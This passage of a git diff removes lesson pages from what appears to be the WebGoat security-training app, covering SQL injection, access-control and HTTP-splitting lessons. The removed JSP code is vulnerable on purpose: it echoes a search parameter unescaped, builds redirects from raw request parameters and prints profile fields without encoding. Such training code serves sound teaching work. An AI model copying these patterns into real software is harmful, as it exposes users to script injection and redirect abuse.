- errorPage="" %>
-<%
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
- Employee employee = (Employee) session.getAttribute("DBSQLInjection." + DBSQLInjection.EMPLOYEE_ATTRIBUTE_KEY);
-// int myUserId = getIntSessionAttribute(webSession, "DBSQLInjection." + DBSQLInjection.USER_ID);
-%>
- Welcome Back <%=webSession.getUserNameInLesson()%>
-
-
-
- First Name:
-
-
- <%=employee.getFirstName()%>
-
-
- Last Name:
-
-
- <%=employee.getLastName()%>
-
-
-
- Street:
-
-
- <%=employee.getAddress1()%>
-
-
- City/State:
-
- <%=employee.getAddress2()%>
-
-
-
- Phone:
-
-
- <%=employee.getPhoneNumber()%>
-
-
- Start Date:
-
-
- <%=employee.getStartDate()%>
-
-
-
- SSN:
-
-
- <%=employee.getSsn()%>
-
-
- Salary:
-
-
- <%=employee.getSalary()%>
-
-
-
- Credit Card:
-
-
- <%=employee.getCcn()%>
-
-
- Credit Card Limit:
-
-
- <%=employee.getCcnLimit()%>
-
-
-
- Comments:
-
-
- <%=employee.getPersonalDescription()%>
-
-
- Manager:
-
-
- <%=employee.getManager()%>
-
-
-
- Disciplinary Explanation:
-
-
- <%=employee.getDisciplinaryActionNotes()%>
-
-
- Disciplinary Action Dates:
-
-
- <%=employee.getDisciplinaryActionDate()%>
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/DBSQLInjection/error.jsp b/src/main/webapp/lessons/DBSQLInjection/error.jsp
deleted file mode 100644
index 5af0a45dc..000000000
--- a/src/main/webapp/lessons/DBSQLInjection/error.jsp
+++ /dev/null
@@ -1,3 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- errorPage="" %>
- An error has occurred.
diff --git a/src/main/webapp/lessons/DBSQLInjection/images/lesson1_SearchWindow.jpg b/src/main/webapp/lessons/DBSQLInjection/images/lesson1_SearchWindow.jpg
deleted file mode 100644
index 39e1ed80d..000000000
Binary files a/src/main/webapp/lessons/DBSQLInjection/images/lesson1_SearchWindow.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/DBSQLInjection/images/lesson1_header.jpg b/src/main/webapp/lessons/DBSQLInjection/images/lesson1_header.jpg
deleted file mode 100644
index 60a809af0..000000000
Binary files a/src/main/webapp/lessons/DBSQLInjection/images/lesson1_header.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/DBSQLInjection/images/lesson1_loginWindow.jpg b/src/main/webapp/lessons/DBSQLInjection/images/lesson1_loginWindow.jpg
deleted file mode 100644
index c91f8a052..000000000
Binary files a/src/main/webapp/lessons/DBSQLInjection/images/lesson1_loginWindow.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/DBSQLInjection/images/lesson1_menu.jpg b/src/main/webapp/lessons/DBSQLInjection/images/lesson1_menu.jpg
deleted file mode 100644
index 2c9512571..000000000
Binary files a/src/main/webapp/lessons/DBSQLInjection/images/lesson1_menu.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/DBSQLInjection/images/lesson1_workspace.jpg b/src/main/webapp/lessons/DBSQLInjection/images/lesson1_workspace.jpg
deleted file mode 100644
index 292d25654..000000000
Binary files a/src/main/webapp/lessons/DBSQLInjection/images/lesson1_workspace.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/General/redirect.jsp b/src/main/webapp/lessons/General/redirect.jsp
deleted file mode 100644
index 41e9abef1..000000000
--- a/src/main/webapp/lessons/General/redirect.jsp
+++ /dev/null
@@ -1,16 +0,0 @@
-<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
- pageEncoding="ISO-8859-1"%>
-
-
-
-
-HTTP Splitting
-
-
-<% response.sendRedirect(request.getContextPath() + "/attack?" +
- "Screen=" + request.getParameter("Screen") +
- "&menu=" + request.getParameter("menu") +
- "&fromRedirect=yes&language=" + request.getParameter("language"));
-%>
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/EditProfile.jsp b/src/main/webapp/lessons/GoatHillsFinancial/EditProfile.jsp
deleted file mode 100644
index d486230e7..000000000
--- a/src/main/webapp/lessons/GoatHillsFinancial/EditProfile.jsp
+++ /dev/null
@@ -1,137 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial"
- errorPage="" %>
-<%
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
- Employee employee = (Employee) session.getAttribute("GoatHillsFinancial.Employee");
-%>
- Welcome Back <%=webSession.getUserNameInLesson()%> - Edit Profile Page
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/GoatHillsFinancial.css b/src/main/webapp/lessons/GoatHillsFinancial/GoatHillsFinancial.css
deleted file mode 100644
index 61e93f63c..000000000
--- a/src/main/webapp/lessons/GoatHillsFinancial/GoatHillsFinancial.css
+++ /dev/null
@@ -1,14 +0,0 @@
-#lesson_wrapper {height: 435px;width: 500px;}
-#lesson_header {background-image: url(lessons/GoatHillsFinancial/images/lesson1_header.jpg);width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}
-.lesson_workspace {background-image: url(lessons/GoatHillsFinancial/images/lesson1_workspace.jpg);width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}
-.lesson_text {height: 240px;width: 460px;padding-top: 5px;}
-#lesson_buttons_bottom {height: 20px;width: 460px;}
-#lesson_b_b_left {width: 300px;float: left;}
-#lesson_b_b_right input {width: 100px;float: right;}
-.lesson_title_box {height: 20px;width: 420px;padding-left: 30px;}
-.lesson_workspace { }
-.lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;}
-.lesson_text_db {color: #0066FF}
-#lesson_login {background-image: url(lessons/GoatHillsFinancial/images/lesson1_loginWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
-#lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: 12px;text-align: center;}
-#lesson_search {background-image: url(lessons/GoatHillsFinancial/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/GoatHillsFinancial.jsp b/src/main/webapp/lessons/GoatHillsFinancial/GoatHillsFinancial.jsp
deleted file mode 100644
index 90dbef989..000000000
--- a/src/main/webapp/lessons/GoatHillsFinancial/GoatHillsFinancial.jsp
+++ /dev/null
@@ -1,30 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="org.owasp.webgoat.session.*"
- errorPage="" %>
-<%@page import="org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;"%>
-
-<%
-WebSession webSession = ((WebSession)session.getAttribute("websession"));
-System.out.println("WebSession is " + webSession);
-GoatHillsFinancial currentLesson = (GoatHillsFinancial) webSession.getCurrentLesson();
-System.out.println("CurrentLesson = " + currentLesson);
-%>
-
-
-
- <%
- String subViewPage = currentLesson.getPage(webSession);
- System.out.println("SubViewPage is " + subViewPage);
- if (subViewPage != null)
- {
- //System.out.println("Including sub view page: " + subViewPage);
- %>
-
- <%
- }
- %>
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/ListStaff.jsp b/src/main/webapp/lessons/GoatHillsFinancial/ListStaff.jsp
deleted file mode 100644
index 40e78abb0..000000000
--- a/src/main/webapp/lessons/GoatHillsFinancial/ListStaff.jsp
+++ /dev/null
@@ -1,57 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial"
- errorPage="" %>
-<%
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
- int myUserId = webSession.getUserIdInLesson();
-%>
- Welcome Back <%=webSession.getUserNameInLesson()%> - Staff Listing Page
-
-
-
- Select from the list below
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/Login.jsp b/src/main/webapp/lessons/GoatHillsFinancial/Login.jsp
deleted file mode 100644
index 9e13040cd..000000000
--- a/src/main/webapp/lessons/GoatHillsFinancial/Login.jsp
+++ /dev/null
@@ -1,32 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial"
- errorPage="" %>
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/SearchStaff.jsp b/src/main/webapp/lessons/GoatHillsFinancial/SearchStaff.jsp
deleted file mode 100644
index 611a826fd..000000000
--- a/src/main/webapp/lessons/GoatHillsFinancial/SearchStaff.jsp
+++ /dev/null
@@ -1,22 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial"
- errorPage="" %>
-
- <%
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
- String searchedName = request.getParameter(GoatHillsFinancial.SEARCHNAME);
- if (searchedName != null)
- {
- %>
- Employee <%=searchedName%> not found.
- <%
- }
- %>
-
- Name
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/ViewProfile.jsp b/src/main/webapp/lessons/GoatHillsFinancial/ViewProfile.jsp
deleted file mode 100644
index a03d60a07..000000000
--- a/src/main/webapp/lessons/GoatHillsFinancial/ViewProfile.jsp
+++ /dev/null
@@ -1,157 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial"
- errorPage="" %>
-<%
- Employee employee = (Employee) session.getAttribute("GoatHillsFinancial." + GoatHillsFinancial.EMPLOYEE_ATTRIBUTE_KEY);
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
-// int myUserId = getIntSessionAttribute(webSession, "GoatHillsFinancial." + GoatHillsFinancial.USER_ID);
-%>
- Welcome Back <%=webSession.getUserNameInLesson()%> - View Profile Page
-
-
-
- First Name:
-
-
- <%=employee.getFirstName()%>
-
-
- Last Name:
-
-
- <%=employee.getLastName()%>
-
-
-
- Street:
-
-
- <%=employee.getAddress1()%>
-
-
- City/State:
-
- <%=employee.getAddress2()%>
-
-
-
- Phone:
-
-
- <%=employee.getPhoneNumber()%>
-
-
- Start Date:
-
-
- <%=employee.getStartDate()%>
-
-
-
- SSN:
-
-
- <%=employee.getSsn()%>
-
-
- Salary:
-
-
- <%=employee.getSalary()%>
-
-
-
- Credit Card:
-
-
- <%=employee.getCcn()%>
-
-
- Credit Card Limit:
-
-
- <%=employee.getCcnLimit()%>
-
-
-
- Comments:
-
-
- <%=employee.getPersonalDescription()%>
-
-
-
-
- Disciplinary Explanation:
-
-
- Disc. Dates:
-
-
- <%=employee.getDisciplinaryActionDate()%>
-
-
-
- <%=employee.getDisciplinaryActionNotes()%>
-
-
-
-
- Manager:
-
-
- <%=employee.getManager()%>
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/error.jsp b/src/main/webapp/lessons/GoatHillsFinancial/error.jsp
deleted file mode 100644
index fdffa05ab..000000000
--- a/src/main/webapp/lessons/GoatHillsFinancial/error.jsp
+++ /dev/null
@@ -1,13 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial"
- errorPage="" %>
-<%
- WebSession webSession = ((WebSession)session.getAttribute(WebSession.SESSION));
-// int myUserId = getIntSessionAttribute(webSession, "GoatHillsFinancial." + GoatHillsFinancial.USER_ID);
-%>
- An error has occurred.
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/images/accessControl.jpg b/src/main/webapp/lessons/GoatHillsFinancial/images/accessControl.jpg
deleted file mode 100644
index e9af72c50..000000000
Binary files a/src/main/webapp/lessons/GoatHillsFinancial/images/accessControl.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/images/dbSchema.jpg b/src/main/webapp/lessons/GoatHillsFinancial/images/dbSchema.jpg
deleted file mode 100644
index 457b634d0..000000000
Binary files a/src/main/webapp/lessons/GoatHillsFinancial/images/dbSchema.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/images/lesson1_SearchWindow.jpg b/src/main/webapp/lessons/GoatHillsFinancial/images/lesson1_SearchWindow.jpg
deleted file mode 100644
index 39e1ed80d..000000000
Binary files a/src/main/webapp/lessons/GoatHillsFinancial/images/lesson1_SearchWindow.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/images/lesson1_header.jpg b/src/main/webapp/lessons/GoatHillsFinancial/images/lesson1_header.jpg
deleted file mode 100644
index 60a809af0..000000000
Binary files a/src/main/webapp/lessons/GoatHillsFinancial/images/lesson1_header.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/images/lesson1_loginWindow.jpg b/src/main/webapp/lessons/GoatHillsFinancial/images/lesson1_loginWindow.jpg
deleted file mode 100644
index c91f8a052..000000000
Binary files a/src/main/webapp/lessons/GoatHillsFinancial/images/lesson1_loginWindow.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/images/lesson1_menu.jpg b/src/main/webapp/lessons/GoatHillsFinancial/images/lesson1_menu.jpg
deleted file mode 100644
index 2c9512571..000000000
Binary files a/src/main/webapp/lessons/GoatHillsFinancial/images/lesson1_menu.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/images/lesson1_workspace.jpg b/src/main/webapp/lessons/GoatHillsFinancial/images/lesson1_workspace.jpg
deleted file mode 100644
index 292d25654..000000000
Binary files a/src/main/webapp/lessons/GoatHillsFinancial/images/lesson1_workspace.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/GoatHillsFinancial/images/orgChart.jpg b/src/main/webapp/lessons/GoatHillsFinancial/images/orgChart.jpg
deleted file mode 100644
index 016c0d162..000000000
Binary files a/src/main/webapp/lessons/GoatHillsFinancial/images/orgChart.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/EditProfile.jsp b/src/main/webapp/lessons/RoleBasedAccessControl/EditProfile.jsp
deleted file mode 100644
index 467c53f04..000000000
--- a/src/main/webapp/lessons/RoleBasedAccessControl/EditProfile.jsp
+++ /dev/null
@@ -1,137 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl"
- errorPage="" %>
-<%
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
- Employee employee = (Employee) session.getAttribute("RoleBasedAccessControl.Employee");
-%>
- Welcome Back <%=webSession.getUserNameInLesson()%> - Edit Profile Page
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/ListStaff.jsp b/src/main/webapp/lessons/RoleBasedAccessControl/ListStaff.jsp
deleted file mode 100644
index 16e976851..000000000
--- a/src/main/webapp/lessons/RoleBasedAccessControl/ListStaff.jsp
+++ /dev/null
@@ -1,57 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl"
- errorPage="" %>
-<%
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
- int myUserId = webSession.getUserIdInLesson();
-%>
- Welcome Back <%=webSession.getUserNameInLesson()%> - Staff Listing Page
-
-
-
- Select from the list below
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/Login.jsp b/src/main/webapp/lessons/RoleBasedAccessControl/Login.jsp
deleted file mode 100644
index 6e97a55e5..000000000
--- a/src/main/webapp/lessons/RoleBasedAccessControl/Login.jsp
+++ /dev/null
@@ -1,32 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl"
- errorPage="" %>
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/RoleBasedAccessControl.css b/src/main/webapp/lessons/RoleBasedAccessControl/RoleBasedAccessControl.css
deleted file mode 100644
index f38977fcf..000000000
--- a/src/main/webapp/lessons/RoleBasedAccessControl/RoleBasedAccessControl.css
+++ /dev/null
@@ -1,14 +0,0 @@
-#lesson_wrapper {height: 435px;width: 500px;}
-#lesson_header {background-image: url(lessons/RoleBasedAccessControl/images/lesson1_header.jpg);width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}
-.lesson_workspace {background-image: url(lessons/RoleBasedAccessControl/images/lesson1_workspace.jpg);width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}
-.lesson_text {height: 240px;width: 460px;padding-top: 5px;}
-#lesson_buttons_bottom {height: 20px;width: 460px;}
-#lesson_b_b_left {width: 300px;float: left;}
-#lesson_b_b_right input {width: 100px;float: right;}
-.lesson_title_box {height: 20px;width: 420px;padding-left: 30px;}
-.lesson_workspace { }
-.lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;}
-.lesson_text_db {color: #0066FF}
-#lesson_login {background-image: url(lessons/RoleBasedAccessControl/images/lesson1_loginWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
-#lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: 12px;text-align: center;}
-#lesson_search {background-image: url(lessons/RoleBasedAccessControl/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/RoleBasedAccessControl.jsp b/src/main/webapp/lessons/RoleBasedAccessControl/RoleBasedAccessControl.jsp
deleted file mode 100644
index 7afc1c789..000000000
--- a/src/main/webapp/lessons/RoleBasedAccessControl/RoleBasedAccessControl.jsp
+++ /dev/null
@@ -1,26 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl"
- errorPage="" %>
-
-<%
-WebSession webSession = ((WebSession)session.getAttribute("websession"));
-RoleBasedAccessControl currentLesson = (RoleBasedAccessControl) webSession.getCurrentLesson();
-%>
-
-
-
- <%
- String subViewPage = currentLesson.getPage(webSession);
- if (subViewPage != null)
- {
- //System.out.println("Including sub view page: " + subViewPage);
- %>
-
- <%
- }
- %>
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/SearchStaff.jsp b/src/main/webapp/lessons/RoleBasedAccessControl/SearchStaff.jsp
deleted file mode 100644
index a9a9f3af2..000000000
--- a/src/main/webapp/lessons/RoleBasedAccessControl/SearchStaff.jsp
+++ /dev/null
@@ -1,22 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl"
- errorPage="" %>
-
- <%
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
- String searchedName = request.getParameter(RoleBasedAccessControl.SEARCHNAME);
- if (searchedName != null)
- {
- %>
- Employee <%=searchedName%> not found.
- <%
- }
- %>
-
- Name
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/ViewProfile.jsp b/src/main/webapp/lessons/RoleBasedAccessControl/ViewProfile.jsp
deleted file mode 100644
index 3e56dd73e..000000000
--- a/src/main/webapp/lessons/RoleBasedAccessControl/ViewProfile.jsp
+++ /dev/null
@@ -1,157 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl"
- errorPage="" %>
-<%
- Employee employee = (Employee) session.getAttribute("RoleBasedAccessControl." + RoleBasedAccessControl.EMPLOYEE_ATTRIBUTE_KEY);
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
-// int myUserId = getIntSessionAttribute(webSession, "RoleBasedAccessControl." + RoleBasedAccessControl.USER_ID);
-%>
- Welcome Back <%=webSession.getUserNameInLesson()%> - View Profile Page
-
-
-
- First Name:
-
-
- <%=employee.getFirstName()%>
-
-
- Last Name:
-
-
- <%=employee.getLastName()%>
-
-
-
- Street:
-
-
- <%=employee.getAddress1()%>
-
-
- City/State:
-
- <%=employee.getAddress2()%>
-
-
-
- Phone:
-
-
- <%=employee.getPhoneNumber()%>
-
-
- Start Date:
-
-
- <%=employee.getStartDate()%>
-
-
-
- SSN:
-
-
- <%=employee.getSsn()%>
-
-
- Salary:
-
-
- <%=employee.getSalary()%>
-
-
-
- Credit Card:
-
-
- <%=employee.getCcn()%>
-
-
- Credit Card Limit:
-
-
- <%=employee.getCcnLimit()%>
-
-
-
- Comments:
-
-
- <%=employee.getPersonalDescription()%>
-
-
-
-
- Disciplinary Explanation:
-
-
- Disc. Dates:
-
-
- <%=employee.getDisciplinaryActionDate()%>
-
-
-
- <%=employee.getDisciplinaryActionNotes()%>
-
-
-
-
- Manager:
-
-
- <%=employee.getManager()%>
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/error.jsp b/src/main/webapp/lessons/RoleBasedAccessControl/error.jsp
deleted file mode 100644
index 419740ee7..000000000
--- a/src/main/webapp/lessons/RoleBasedAccessControl/error.jsp
+++ /dev/null
@@ -1,13 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl"
- errorPage="" %>
-<%
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
-// int myUserId = getIntSessionAttribute(webSession, "RoleBasedAccessControl." + RoleBasedAccessControl.USER_ID);
-%>
- An error has occurred.
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/images/accessControl.jpg b/src/main/webapp/lessons/RoleBasedAccessControl/images/accessControl.jpg
deleted file mode 100644
index e9af72c50..000000000
Binary files a/src/main/webapp/lessons/RoleBasedAccessControl/images/accessControl.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/images/dbSchema.jpg b/src/main/webapp/lessons/RoleBasedAccessControl/images/dbSchema.jpg
deleted file mode 100644
index 457b634d0..000000000
Binary files a/src/main/webapp/lessons/RoleBasedAccessControl/images/dbSchema.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/images/lesson1_SearchWindow.jpg b/src/main/webapp/lessons/RoleBasedAccessControl/images/lesson1_SearchWindow.jpg
deleted file mode 100644
index 39e1ed80d..000000000
Binary files a/src/main/webapp/lessons/RoleBasedAccessControl/images/lesson1_SearchWindow.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/images/lesson1_header.jpg b/src/main/webapp/lessons/RoleBasedAccessControl/images/lesson1_header.jpg
deleted file mode 100644
index 60a809af0..000000000
Binary files a/src/main/webapp/lessons/RoleBasedAccessControl/images/lesson1_header.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/images/lesson1_loginWindow.jpg b/src/main/webapp/lessons/RoleBasedAccessControl/images/lesson1_loginWindow.jpg
deleted file mode 100644
index c91f8a052..000000000
Binary files a/src/main/webapp/lessons/RoleBasedAccessControl/images/lesson1_loginWindow.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/images/lesson1_menu.jpg b/src/main/webapp/lessons/RoleBasedAccessControl/images/lesson1_menu.jpg
deleted file mode 100644
index 2c9512571..000000000
Binary files a/src/main/webapp/lessons/RoleBasedAccessControl/images/lesson1_menu.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/images/lesson1_workspace.jpg b/src/main/webapp/lessons/RoleBasedAccessControl/images/lesson1_workspace.jpg
deleted file mode 100644
index 292d25654..000000000
Binary files a/src/main/webapp/lessons/RoleBasedAccessControl/images/lesson1_workspace.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/images/orgChart.jpg b/src/main/webapp/lessons/RoleBasedAccessControl/images/orgChart.jpg
deleted file mode 100644
index 016c0d162..000000000
Binary files a/src/main/webapp/lessons/RoleBasedAccessControl/images/orgChart.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/SQLInjection/EditProfile.jsp b/src/main/webapp/lessons/SQLInjection/EditProfile.jsp
deleted file mode 100644
index 38ca58086..000000000
--- a/src/main/webapp/lessons/SQLInjection/EditProfile.jsp
+++ /dev/null
@@ -1,133 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.SQLInjection.SQLInjection"
- errorPage="" %>
-<%
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
- Employee employee = (Employee) session.getAttribute("SQLInjection.Employee");
-%>
- Welcome Back <%=webSession.getUserNameInLesson()%>
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/SQLInjection/ListStaff.jsp b/src/main/webapp/lessons/SQLInjection/ListStaff.jsp
deleted file mode 100644
index 5b6256e71..000000000
--- a/src/main/webapp/lessons/SQLInjection/ListStaff.jsp
+++ /dev/null
@@ -1,57 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.SQLInjection.SQLInjection"
- errorPage="" %>
-<%
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
- int myUserId = webSession.getUserIdInLesson();
-%>
- Welcome Back <%=webSession.getUserNameInLesson()%> - Staff Listing Page
-
-
-
- Select from the list below
-
-
-
-
-
-
diff --git a/src/main/webapp/lessons/SQLInjection/Login.jsp b/src/main/webapp/lessons/SQLInjection/Login.jsp
deleted file mode 100644
index a88d694db..000000000
--- a/src/main/webapp/lessons/SQLInjection/Login.jsp
+++ /dev/null
@@ -1,32 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.SQLInjection.SQLInjection"
- errorPage="" %>
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/SQLInjection/SQLInjection.css b/src/main/webapp/lessons/SQLInjection/SQLInjection.css
deleted file mode 100644
index 177129117..000000000
--- a/src/main/webapp/lessons/SQLInjection/SQLInjection.css
+++ /dev/null
@@ -1,14 +0,0 @@
-#lesson_wrapper {height: 435px;width: 500px;}
-#lesson_header {background-image: url(lessons/SQLInjection/images/lesson1_header.jpg);width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}
-.lesson_workspace {background-image: url(lessons/SQLInjection/images/lesson1_workspace.jpg);width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}
-.lesson_text {height: 240px;width: 460px;padding-top: 5px;}
-#lesson_buttons_bottom {height: 20px;width: 460px;}
-#lesson_b_b_left {width: 300px;float: left;}
-#lesson_b_b_right input {width: 100px;float: right;}
-.lesson_title_box {height: 20px;width: 420px;padding-left: 30px;}
-.lesson_workspace { }
-.lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;}
-.lesson_text_db {color: #0066FF}
-#lesson_login {background-image: url(lessons/SQLInjection/images/lesson1_loginWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
-#lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: 12px;text-align: center;}
-#lesson_search {background-image: url(lessons/SQLInjection/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
diff --git a/src/main/webapp/lessons/SQLInjection/SQLInjection.jsp b/src/main/webapp/lessons/SQLInjection/SQLInjection.jsp
deleted file mode 100644
index 51dbc4f3f..000000000
--- a/src/main/webapp/lessons/SQLInjection/SQLInjection.jsp
+++ /dev/null
@@ -1,26 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.SQLInjection.SQLInjection"
- errorPage="" %>
-
-<%
-WebSession webSession = ((WebSession)session.getAttribute("websession"));
-SQLInjection currentLesson = (SQLInjection) webSession.getCurrentLesson();
-%>
-
-
-
- <%
- String subViewPage = currentLesson.getPage(webSession);
- if (subViewPage != null)
- {
- //System.out.println("Including sub view page: " + subViewPage);
- %>
-
- <%
- }
- %>
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/SQLInjection/SearchStaff.jsp b/src/main/webapp/lessons/SQLInjection/SearchStaff.jsp
deleted file mode 100644
index cf86d0dad..000000000
--- a/src/main/webapp/lessons/SQLInjection/SearchStaff.jsp
+++ /dev/null
@@ -1,22 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
